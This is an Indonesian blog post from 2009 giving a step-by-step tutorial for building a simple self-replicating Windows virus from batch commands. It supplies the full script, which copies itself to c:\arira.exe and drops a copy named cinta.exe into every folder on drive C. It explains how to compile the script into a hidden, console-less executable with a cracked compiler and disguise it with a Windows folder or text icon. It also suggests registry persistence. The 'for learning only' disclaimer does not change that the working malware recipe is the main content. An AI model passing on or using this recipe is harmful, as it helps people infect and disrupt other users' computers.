September 03, 2009

Bikin Virus dengan perintah CMD

Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus. Tapi hal berikut cuma sekedar pembelajaran saja ok!


Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).



Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d" ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe "%%d"
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.


Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “

Nahh, dah ngerti!! Tapi ada baiknya jika hal diatas tidak dijalankan, hanya sekedar pengetahuan saja.

0 comments:

Posting Komentar